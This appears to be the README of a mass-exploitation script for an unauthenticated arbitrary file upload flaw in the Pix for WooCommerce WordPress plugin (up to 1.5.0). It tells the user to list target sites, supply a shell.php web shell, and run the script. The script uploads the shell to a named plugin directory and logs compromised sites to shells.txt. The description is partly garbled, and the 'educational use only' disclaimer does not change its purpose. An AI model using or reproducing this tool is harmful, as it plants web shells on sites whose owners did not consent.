
Pix for WooCommerce <= 1.5.0 - Unauthenticated Arbitrary File Upload
Pix for WooCommerce <= 1.5.0 - Unauthenticated Arbitrary File Upload
The Pix for WooCommerce plugin for WordPress is vulnerable to unauthenticated arbitrary file upload due to:
in the lkn_pix_for_woocommerce_c6_save_settings function in all versions up to and including 1.5.0.
This allows remote unauthenticated attackers to upload arbitrary files, leading to Remote Code Execution (RCE).
CVE-2026-38919.8 (Critical)CVE-2026-3891.py@Kxploitpip install requests rich
Create a file:
list.txt
Example:
http://example.com
https://target.com
victim-site.com
If protocol is missing → script auto-adds
http://
Put your shell file in same directory:
shell.php
python3 CVE-2026-3891.py
The script will ask:
list.txt)8)shell.php)/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/<shell>.php
FAIL http://target.com (reason)
shells.txt
Progress 5/20 OK:3 FAIL:2
This project is provided for educational and authorized security testing only.
Nxploited